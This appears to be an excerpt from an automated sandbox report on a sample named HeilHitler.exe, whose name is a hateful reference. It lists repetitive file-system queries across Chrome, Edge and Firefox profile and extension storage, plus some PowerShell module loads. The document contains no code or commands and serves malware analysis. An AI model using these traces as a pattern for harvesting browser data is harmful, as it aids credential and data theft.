              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\uk VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ur VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\vi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
